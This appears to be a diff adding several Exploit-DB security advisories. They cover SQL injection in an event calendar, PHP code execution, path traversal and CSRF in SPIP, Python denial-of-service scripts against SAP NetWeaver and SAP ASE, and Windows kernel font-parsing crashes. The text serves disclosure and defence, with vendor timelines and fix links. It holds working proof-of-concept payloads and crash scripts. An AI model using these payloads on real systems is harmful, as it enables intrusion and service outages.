# Vendor Homepage: http://eventcalendarphp.com/
# Date: 21 Oct 2016
# Version : 1.5
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable Url:
http://localhost/eventcalendar/admin.php?act=options&cal_id=[payload]
http://localhost/eventcalendar/admin.php?act=cal_options&cal_id=[payload]
http://localhost/eventcalendar/admin.php?act=cal_language&cal_id=[payload]
Vulnerable parameter : cal_id
Mehod : GET
A simple inject :
Payload : '+order+by+20--+
http://localhost/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+
In response can see result :
query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by
20-- '. Error: Unknown column '20' in 'order clause'
Result of payload: Error: Unknown column '20' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================

87
platforms/php/webapps/40595.txt Executable file
View file

@ -0,0 +1,87 @@
## SPIP 3.1.2 Template Compiler/Composer PHP Code Execution (CVE-2016-7998)
### Product Description
SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence.
### Vulnerability Description
The SPIP template composer/compiler does not correctly handle SPIP "INCLUDE/INCLURE" Tags, allowing PHP code execution by an authenticated user.
This vulnerability can be exploited using the CSRF or the XSS vulnerability also found in this advisory.
**Access Vector**: remote
**Security Risk**: critical
**Vulnerability**: CWE-94
**CVSS Base Score**: 9.1 (Critical)
**CVE-ID**: CVE-2016-7998
### Proof of Concept
Store a `.html` file in a random directory with the following content :
<INCLURE(xxx"\)\);}system\("touch /tmp/exploited"\);/*)>
Then you can access to the following URL, with the `var_url` paramater pointing to the path corresponding to your uploaded file:
http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=file:///tmp/directory&ext=html
The PHP code `system("touch /tmp/exploited");` will be executed after 2 requests.
This happens because the template file is included (if already compiled) by `ecrire/public/composer.php`, line 60 :
if (!squelette_obsolete($phpfile, $source)) {
include_once $phpfile;
and because we can "exit" the function generated by the template compiler (improper sanitization when generating argumenter_squelette):
function html_xxxx($Cache, $Pile, $doublons = array(), $Numrows = array(), $SP = 0) {
if (isset($Pile[0]["doublons"]) AND is_array($Pile[0]["doublons"]))
$doublons = nettoyer_env_doublons($Pile[0]["doublons"]);
$connect = '';
$page = (
'<'.'?php echo recuperer_fond( ' . argumenter_squelette("xxx"));}system("touch /tmp/exploited");/*") . ', array(\'lang\' => ' . argumenter_squelette($GLOBALS["spip_lang"]) . '), array("compil"=>array(\'/tmp/exploit.html\',\'html_xxxx\',\'\',1,$GLOBALS[\'spip_lang\'])), _request("connect"));
?'.'>
');
return analyse_resultat_skel('html_xxxx', $Cache, $page, '/tmp/exploit.html');
}
Therefore, the vulnerability leads to arbitrary PHP code execution.
### Vulnerable code
The vulnerable code is located in the `argumenter_inclure` function (`ecrire/public/compiler.php`), line 123.
if ($var !== 1) {
$val = ($echap ? "\'$var\' => ' . argumenter_squelette(" : "'$var' => ")
. $val . ($echap ? ") . '" : " ");
}
### Timeline (dd/mm/yyyy)
* 15/09/2016 : Initial discovery
* 26/09/2016 : Contact with SPIP Team
* 27/09/2016 : Answer from SPIP Team, sent advisory details
* 27/09/2016 : Fixes issued for PHP Code Execution
* 30/09/2016 : SPIP 3.1.3 Released
### Fixes
* https://core.spip.net/projects/spip/repository/revisions/23186
* https://core.spip.net/projects/spip/repository/revisions/23189
* https://core.spip.net/projects/spip/repository/revisions/23192
### Affected versions
* Version <= 3.1.2
### Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream

95
platforms/php/webapps/40596.txt Executable file
View file

@ -0,0 +1,95 @@
## SPIP 3.1.1/3.1.2 File Enumeration / Path Traversal (CVE-2016-7982)
### Product Description
SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence.
### Vulnerability Description
The `valider_xml` file can be used to enumerate files on the system.
**Access Vector**: remote
**Security Risk**: medium
**Vulnerability**: CWE-538
**CVSS Base Score**: 4.9 (Medium)
**CVE-ID**: CVE-2016-7982
### Proof of Concept
Enumerating `.ini` files inside `/etc` (SPIP 3.1.1) :
http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=/etc&ext=ini&recur=2
Bypassing SPIP 3.1.2 protection using PHP Wrappers :
http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=file:///etc&ext=ini&recur=2
### Vulnerable code
if (is_dir($url)) {
$dir = (substr($url, -1, 1) === '/') ? $url : "$url/";
$ext = !preg_match('/^[.*\w]+$/', $req_ext) ? 'php' : $req_ext;
$files = preg_files($dir, "$ext$", $limit, $rec);
if (!$files and $ext !== 'html') {
$files = preg_files($dir, 'html$', $limit, $rec);
if ($files) {
$ext = 'html';
}
}
if ($files) {
$res = valider_dir($files, $ext, $url);
list($err, $res) = valider_resultats($res, $ext === 'html');
File names are stored in `$res` and displayed by `echo` on line 146 :
echo "<h1>", $titre, '<br>', $bandeau, '</h1>',
"<div style='text-align: center'>", $onfocus, "</div>",
$res,
fin_page();
### Timeline (dd/mm/yyyy)
* 15/09/2016 : Initial discovery
* 26/09/2016 : Contact with SPIP Team
* 27/09/2016 : Answer from SPIP Team, sent advisory details
* 27/09/2016 : Incorrect fixes for Path Traversal
* 27/09/2016 : New proof of concept for bypassing Path Traversal sent.
* 27/09/2016 : Bad fix for Path Traversal (23185)
* 28/09/2016 : New proof of concept for bypassing fixes for Path Traversal on Windows systems.
* 28/09/2016 : Fixes issued Path Traversal (23200)
* 30/09/2016 : SPIP 3.1.3 Released
### Fixes
* https://core.spip.net/projects/spip/repository/revisions/23207
* https://core.spip.net/projects/spip/repository/revisions/23208
* https://core.spip.net/projects/spip/repository/revisions/23206
* https://core.spip.net/projects/spip/repository/revisions/23202
* https://core.spip.net/projects/spip/repository/revisions/23201
* https://core.spip.net/projects/spip/repository/revisions/23200
* https://core.spip.net/projects/spip/repository/revisions/23191
* https://core.spip.net/projects/spip/repository/revisions/23190
* https://core.spip.net/projects/spip/repository/revisions/23193
* https://core.spip.net/projects/spip/repository/revisions/23188
* https://core.spip.net/projects/spip/repository/revisions/23187
* https://core.spip.net/projects/spip/repository/revisions/23185
* https://core.spip.net/projects/spip/repository/revisions/23182
* https://core.spip.net/projects/spip/repository/revisions/23184
### Affected versions
* Version <= 3.1.2
### Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream

48
platforms/php/webapps/40597.txt Executable file
View file

@ -0,0 +1,48 @@
## SPIP 3.1.2 Exec Code Cross-Site Request Forgery (CVE-2016-7980)
### Product Description
SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence.
### Vulnerability Description
The vulnerable request to `valider_xml` (see: *SPIP 3.1.2 Template Compiler/Composer PHP Code Execution - CVE-2016-7998*) is vulnerable to Cross-Site Request Forgery, allowing the execution of the CVE-2016-7998 attack by tricking an administrator to open the malicious link.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-352
**CVSS Base Score**: 8.3 (High)
**CVE-ID**: CVE-2016-7980
### Proof of Concept
http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=/tmp/directory&ext=html
### Timeline (dd/mm/yyyy)
* 15/09/2016 : Initial discovery
* 26/09/2016 : Contact with SPIP Team
* 27/09/2016 : Answer from SPIP Team, sent advisory details
* 28/09/2016 : Fixes issued for CSRF
* 30/09/2016 : SPIP 3.1.3 Released
### Fixes
* https://core.spip.net/projects/spip/repository/revisions/23200
* https://core.spip.net/projects/spip/repository/revisions/23201
* https://core.spip.net/projects/spip/repository/revisions/23202
### Affected versions
* Version <= 3.1.2
### Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream

13
platforms/windows/dos/30773.txt
View file

@ -1,13 +0,0 @@
source: http://www.securityfocus.com/bid/26468/info
Microsoft Jet Database Engine is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data.
Remote attackers can exploit this issue to execute arbitrary machine code in the context of a user running the application. Successful exploits will compromise the affected application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions.
NOTE: Further details report that attackers are using malicious Word files to load specially crafted MDB files. Microsoft has released a knowledge base article (950627) documenting this attack vector.
This issue does not affect Windows Server 2003 Service Pack 2, Windows XP Service Pack 3, Windows XP x64 edition Server Pack 2, Windows Vista, Windows Vista Service Pack 1 and Windows Server 2008 because they run a version of the Jet Database Engine that isn't vulnerable.
This issue does affect the Jet Database Engine, Microsoft Word 2000 Service Pack 3, Microsoft Word 2002 Service Pack 3, Microsoft Word 2003 Service Pack 2, Microsoft Word 2003 Service Pack 3, Microsoft Word 2007, and Microsoft Word 2007 Service Pack 1 on Microsoft Windows 2000, Windows XP, or Windows Server 2003 Service Pack 1.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30773.mdb

261
platforms/windows/dos/40592.py Executable file
View file

@ -0,0 +1,261 @@
'''
Application: SAP NetWeaver KERNEL
Versions Affected: SAP NetWeaver KERNEL 7.0-7.5
Vendor URL: http://SAP.com
Bugs: Denial of Service
Sent: 09.03.2016
Reported: 10.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 12.07.2016
Reference: SAP Security Note 2295238
Author: Dmitry Yudin (ERPScan)
Description
1. ADVISORY INFORMATION
Title: [ERPSCAN-16-030] SAP NetWeaver buffer overflow vulnerability
Advisory ID: [ERPSCAN-16-030]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/
Date published: 12.10.2016
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: Denial of Service
Impact: DoS
Remotely Exploitable: yes
Locally Exploitable: yes
CVSS Information
CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) Low (L)
PR : Privileges Required (Level of privileges needed to exploit) None (N)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)
C : Impact to Confidentiality None (N)
I : Impact to Integrity Low (L)
A : Impact to Availability Low (L)
3. VULNERABILITY DESCRIPTION
This vulnerability allows an attacker to send a special request to the
SAPSTARTSRV process port and conduct stack buffer overflow (recursion)
on the SAP server.
4. VULNERABLE PACKAGES
SAP KERNEL 7.21 32-BIT 625
SAP KERNEL 7.21 32-BIT UNICODE 625
SAP KERNEL 7.21 64-BIT 625
SAP KERNEL 7.21 64-BIT UNICODE 625
SAP KERNEL 7.21 EXT 32-BIT 625
SAP KERNEL 7.21 EXT 32-BIT UC 625
SAP KERNEL 7.21 EXT 64-BIT 625
SAP KERNEL 7.21 EXT 64-BIT UC 625
SAP KERNEL 7.22 64-BIT 113
SAP KERNEL 7.22 64-BIT UNICODE 113
SAP KERNEL 7.22 EXT 64-BIT 113
SAP KERNEL 7.22 EXT 64-BIT UC 113
SAP KERNEL 7.42 64-BIT 412
SAP KERNEL 7.42 64-BIT UNICODE 412
SAP KERNEL 7.45 64-BIT 113
SAP KERNEL 7.45 64-BIT UNICODE 113
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2295238
6. AUTHOR
Dmitry Yudin (ERPScan)
7. TECHNICAL DESCRIPTION
7.1. Proof of Concept
'''
import socket
PoC = """<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header>
<sapsess:Session
xlmns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
> """ + "<a>" * 100000 + "</a>" * 100000 + """ </sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:WW xmlns:ns1="urn:SAPControl">
<b></b>
<e><e>
</ns1:WW>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
for i in range(1,5):
sock = socket.socket()
sock.connect(("SAP_IP", SAP_PORT))
sock.send(PoC)
'''
Windbg exceptions
sapstartsrv!soap_getutf8+0xa:
00000001`4009cd2a e891f9ffff call sapstartsrv!soap_get
(00000001`4009c6c0)
rax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0
rdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0
rip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0
r8=0000000134936c69 r9=0000000000000000 r10=0000000000000000
r11=000000014061ee28 r12=0000000000000000 r13=000000000000270f
r14=00000001409f8ba0 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
8. REPORT TIMELINE
Sent: 09.03.2016
Reported: 10.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 12.07.2016
9. REFERENCES
https://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/
10. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
11. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
Emerging Vendor in Security by CRN, listed among TOP 100 SAP
Solution providers and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScans primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We follow the sun and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
'''

243
platforms/windows/dos/40593.py Executable file
View file

@ -0,0 +1,243 @@
'''
Application: SAP Adaptive Server Enterprise
Versions Affected: SAP Adaptive Server Enterprise 16
Vendor URL: http://SAP.com
Bugs: Denial of Service
Sent: 01.02.2016
Reported: 02.02.2016
Vendor response: 02.02.2016
Date of Public Advisory: 12.07.2016
Reference: SAP Security Note 2330839
Author: Vahagn Vardanyan(ERPScan)
Description
1. ADVISORY INFORMATION
Title: [ERPSCAN-16-028] SAP Adaptive Server Enterprise DoS vulnerability
Advisory ID: [ERPSCAN-16-028]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-028-sap-adaptive-server-enterprise-null-pointer-exception/
Date published: 12.17.2016
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: Denial of Service
Impact: DoS
Remotely Exploitable: yes
Locally Exploitable: yes
CVSS Information
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) Low (L)
PR : Privileges Required (Level of privileges needed to exploit) None (N)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)
C : Impact to Confidentiality None (N)
I : Impact to Integrity None (N)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
Anonymous attacker can send a special request to the SAP Adaptive
Server Enterprise and crash the server.
4. VULNERABLE PACKAGES
SAP Open Server 16.0 SP01, SP02
SAP ASE 16.0 SP01, SP02
SAP Replication Server SP207, SP209, SP210, SP3XX
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2330839
6. AUTHOR
Vahagn Vardanyan (ERPScan)
7. TECHNICAL DESCRIPTION
Proof of Concept
Sending special request to the SAP Adaptive Server Enterprise 16
(backup server) can get crash the server.
PoC
'''
import socket
PoC = "\xe2\xf3\x00\x9d\x80\x8e\xf3\xa0" \
"\x80\xb4\x00\x81\xb0\x00\x00\x93" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x31\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x34\x31\x30\x35\x37\x32" \
"\x37\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00"
s = socket.socket()
s.settimeout(1)
s.connect((SERVER_IP, SERVER_PORT))
s.send(PoC)
print(PoC)
s.close()
'''
0:019> r
rax=0000000000000000 rbx=000000000097c000 rcx=0000000000000000
rdx=00000000010bf810 rsi=0000000000970a30 rdi=0000000000904cb0
rip=00000000004027b4 rsp=00000000010bf7f0 rbp=0000000000000000
r8=0000000000904c90 r9=0000000000904ca0 r10=0000000000000000
r11=0000000000000246 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
libsybcomn64!comn_symkey_set_iv+0x34:
00000000`004027b4 488b4820 mov rcx,qword ptr [rax+20h]
ds:00000000`00000020=????????????????
8. REPORT TIMELINE
Sent: 01.02.2016
Reported: 02.02.2016
Vendor response: 02.02.2016
Date of Public Advisory: 12.07.2016
9. REFERENCES
https://erpscan.com/advisories/erpscan-16-028-sap-adaptive-server-enterprise-null-pointer-exception/
10. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
11. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
Emerging Vendor in Security by CRN, listed among TOP 100 SAP
Solution providers and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScans primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We follow the sun and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
'''

99
platforms/windows/dos/40598.txt Executable file
View file

@ -0,0 +1,99 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=864
We have encountered a number of Windows kernel crashes in the win32k!itrp_GetCVTEntryFast function (called by the handler of the RCVT TrueType instruction) while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fb000078, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 8ee70ccb, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
READ_ADDRESS: fb000078 Paged session pool
FAULTING_IP:
win32k!itrp_GetCVTEntryFast+8
8ee70ccb 8b048a mov eax,dword ptr [edx+ecx*4]
MM_INTERNAL_CODE: 0
IMAGE_NAME: win32k.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 57349934
MODULE_NAME: win32k
FAULTING_MODULE: 8ee20000 win32k
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
TRAP_FRAME: 897b3568 -- (.trap 0xffffffff897b3568)
ErrCode = 00000000
eax=fafffcdc ebx=00000000 ecx=000000ff edx=fafffc7c esi=fafffe6e edi=00000000
eip=8ee70ccb esp=897b35dc ebp=897b3620 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
win32k!itrp_GetCVTEntryFast+0x8:
8ee70ccb 8b048a mov eax,dword ptr [edx+ecx*4] ds:0023:fb000078=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 828edd87 to 82889978
STACK_TEXT:
897b30bc 828edd87 00000003 7170889f 00000065 nt!RtlpBreakWithStatusInstruction
897b310c 828ee885 00000003 00000000 00000000 nt!KiBugCheckDebugBreak+0x1c
897b34d0 8289c94d 00000050 fb000078 00000000 nt!KeBugCheck2+0x68b
897b3550 8284efa8 00000000 fb000078 00000000 nt!MmAccessFault+0x104
897b3550 8ee70ccb 00000000 fb000078 00000000 nt!KiTrap0E+0xdc
897b35d8 8ee83782 fafffe7b 8ee7bf89 00000001 win32k!itrp_GetCVTEntryFast+0x8
897b35e0 8ee7bf89 00000001 8ee81af3 00000000 win32k!itrp_RCVT+0x63
897b35e8 8ee81af3 00000000 fafffcdc faffff10 win32k!itrp_InnerExecute+0x38
897b3620 8ee7bf89 fafffcdc 8ee7f3b1 fafffd70 win32k!itrp_CALL+0x23b
897b3628 8ee7f3b1 fafffd70 fafffd38 faffff90 win32k!itrp_InnerExecute+0x38
897b36a8 8ee7cee8 fafffec8 faffff10 fafffcdc win32k!itrp_Execute+0x2b2
897b36dc 8ee85d0d fafffcdc 00000000 fa44a298 win32k!itrp_ExecutePrePgm+0x5d
897b36f8 8ee7f67c fa44a51c fafffc7c fa44a2c4 win32k!fsg_RunPreProgram+0x78
897b3758 8ee89385 00000001 897b3774 8ee892dc win32k!fs__Contour+0x1c1
897b3764 8ee892dc fa44a010 fa44a07c 897b3790 win32k!fs_ContourGridFit+0x12
897b3774 8ee89c38 fa44a010 fa44a07c 00000003 win32k!fs_NewContourGridFit+0x10
897b3790 8ee89c79 fc11ae78 00000003 897b37cc win32k!bGetGlyphOutline+0xd7
897b37b8 8ee89e72 fc11ae78 00000003 00000001 win32k!bGetGlyphMetrics+0x20
897b38fc 8ee7ef89 fc11ae78 00000003 897b39ec win32k!lGetGlyphBitmap+0x2b
897b3924 8ee7edd6 00000000 00000001 00000003 win32k!ttfdQueryFontData+0x15e
897b3974 8ee7dff2 fc396010 fc1d0cf0 00000001 win32k!ttfdSemQueryFontData+0x45
897b39bc 8ee7e169 fc396010 fc1d0cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
897b3a30 8ee7bc81 00000002 897b3bdc 00000000 win32k!RFONTOBJ::bInitCache+0xd4
897b3aec 8eef8655 897b3bc8 897b3b94 00000003 win32k!RFONTOBJ::bRealizeFont+0x5df
897b3b98 8eef8890 fc74ad80 00000000 00000002 win32k!RFONTOBJ::bInit+0x2f4
897b3bb0 8ee8f111 897b3bc8 00000000 00000002 win32k!RFONTOBJ::vInit+0x16
897b3bd4 8ee8f262 fc1d0cf0 897b3bf4 0678b8bd win32k!GreGetRealizationInfo+0x2a
897b3c24 8284bdc6 37010587 0459f2cc 0459f2e4 win32k!NtGdiGetRealizationInfo+0x41
897b3c24 77346bf4 37010587 0459f2cc 0459f2e4 nt!KiSystemServicePostCall
0459f2e4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---
The bugcheck is caused by an attempt to access an out-of-bounds CVT table index (255 in this case, see the ECX register), likely due to a weird behavior of the win32k!itrp_RCVT function, which allows the index to be larger than the size of the array as long as it is smaller than 256. The bug appears to only enable an out-of-bounds read primitive, since at a first glance, the corresponding WCVT instruction handler does not seem to be affected by the same problem. Still, even in its current form, the vulnerability could be used to disclose the contents of adjacent pool allocations to user-mode, potentially leaking sensitive kernel memory or facilitating a KASLR bypass.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys, but it is also possible to observe a crash on a default Windows installation. Just hovering over the proof of concept files or opening them in the default Windows Font Viewer tool should be sufficient to trigger the condition.
Attached is an archive with two proof of concept font files.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40598.zip

163
platforms/windows/dos/40599.txt Executable file
View file

@ -0,0 +1,163 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=868
We have encountered Windows kernel crashes in the win32k!sbit_Embolden and win32k!ttfdCloseFontContext functions while processing corrupted TTF font files. Excerpts of them are shown below:
---
KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)
This is a very common bugcheck. Usually the exception address pinpoints
the driver/function that caused the problem. Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x80000003. This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG. This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG. This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 8e70bba3, The address that the exception occurred at
Arg3: 9b7e3a84, Trap Frame
Arg4: 00000000
Debugging Details:
------------------
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
FAULTING_IP:
win32k!MultiUserGreTrackRemoveEngResource+1c
8e70bba3 8901 mov dword ptr [ecx],eax
TRAP_FRAME: 9b7e3a84 -- (.trap 0xffffffff9b7e3a84)
ErrCode = 00000002
eax=fa42ce68 ebx=fa42ce78 ecx=00000000 edx=00000000 esi=ff73a000 edi=fc4a4fc8
eip=8e70bba3 esp=9b7e3af8 ebp=9b7e3af8 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
win32k!MultiUserGreTrackRemoveEngResource+0x1c:
8e70bba3 8901 mov dword ptr [ecx],eax ds:0023:00000000=????????
Resetting default scope
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x8E
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 2
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 82933d87 to 828cf978
STACK_TEXT:
9b7e303c 82933d87 00000003 1d46c818 00000065 nt!RtlpBreakWithStatusInstruction
9b7e308c 82934885 00000003 9b7e3490 00000000 nt!KiBugCheckDebugBreak+0x1c
9b7e3450 82933c24 0000008e c0000005 8e70bba3 nt!KeBugCheck2+0x68b
